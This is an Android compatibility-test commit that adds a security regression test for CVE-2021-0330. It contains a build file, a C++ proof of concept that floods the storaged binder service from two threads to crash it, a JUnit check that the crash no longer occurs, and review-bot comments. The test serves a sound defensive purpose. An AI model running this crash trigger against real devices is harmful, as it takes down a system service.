author | TreeHugger Robot <treehugger-gerrit@google.com> | 2021-01-13 05:13:47 +0000 |
---|---|---|
committer | Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com> | 2021-01-13 05:13:47 +0000 |
commit | cf75875aa1e0f92cbedef09ed5408529c569ff49 (patch) | |
tree | bf817b8d407b004d0d07b883b2b4273e7b272fc6 | |
parent | 43aa8508b19ab5e0e97318122487333214a9cdc6 (diff) | |
parent | 969f92c32c1436363a0b22efc9152a9ae3920786 (diff) | |
Merge changes I32758630,Ie8577639,I137dfce1,I2b7cfc76 into qt-dev am: cc01bf5a93 am: b7faba84d6 am: 969f92c32c
Original change: https://googleplex-android-review.googlesource.com/c/platform/cts/+/13325388
MUST ONLY BE SUBMITTED BY AUTOMERGER
Change-Id: I8ab1a90e6bce7f814e5a39080c938b961ca8638f
3 files changed, 138 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
new file mode 100644
index 00000000000..30915d5af09
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0330",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
new file mode 100644
index 00000000000..4d7254f108b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
@@ -0,0 +1,70 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+#include <pthread.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+using namespace android;
+
+static int userId = 0;
+constexpr int kMaxThreads = 2;
+constexpr int kMaxUsers = 1024 * 1024;
+constexpr int kSleepDuration = 5;
+
+
+static void *trigger_onUserStarted(void *p __attribute__((unused))) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+
+ if (not service) {
+ return nullptr;
+ }
+
+ while (userId < kMaxUsers) {
+ Parcel data, reply;
+ data.writeInterfaceToken(service->getInterfaceDescriptor());
+ data.writeInt32(++userId);
+ service->transact(1, data, &reply, 0);
+ }
+
+ return nullptr;
+}
+
+int main() {
+ pthread_t threads[kMaxThreads];
+
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_create(&threads[t], nullptr, trigger_onUserStarted, nullptr);
+ }
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_join(threads[t], nullptr);
+ }
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+ if (service) {
+ break;
+ }
+ sleep(kSleepDuration);
+ }
+
+ return EXIT_SUCCESS;
+}
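Review bot: `userId` is a plain `static int` that both worker threads read in `while (userId < kMaxUsers)` and modify with `++userId` inside `trigger_onUserStarted`, which is a data race in the test program itself, so ids can repeat or be skipped and runs are not reproducible. Declaring it as `static std::atomic<int> userId{0};` (plus `#include <atomic>`) keeps the two threads calling concurrently while giving each call a distinct id. In `main`, the result of `pthread_create` is ignored, so a failed create leaves `threads[t]` uninitialised when `pthread_join` reads it; check the return value and join only the threads that actually started. The bare transaction code in `service->transact(1, data, &reply, 0)` would also be clearer with a comment such as `// 1: presumably storaged's onUserStarted transaction - confirm against the interface definition`.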
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
new file mode 100644
index 00000000000..3d3f4a8bc15
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0330 extends SecurityTestCase {
+
+ /**
+ * b/170732441
+ * Vulnerability Behaviour: SIGSEGV in storaged
+ */
+ @SecurityTest(minPatchLevel = "2021-02")
+ @Test
+ public void testPocCVE_2021_0330() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0330", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("storaged");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
|
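Review bot: `testConfig.config.checkMinAddress(false)` in `testPocCVE_2021_0330` switches off the crash parser's minimum-fault-address filter without a comment saying why, so a later reader cannot tell whether low-address faults in storaged are the expected signal or an accident. A line above it such as `// Count low-address SIGSEGVs too; the storaged fault for b/170732441 may be near null (confirm)` would record the intent. The Javadoc could also state that the verdict appears to come only from crash records matching `storaged`, since the PoC binary returns `EXIT_SUCCESS` on every path. If that is right, a device where the `storaged` service is not registered would pass without exercising the code under test, which is worth a sentence in the Javadoc.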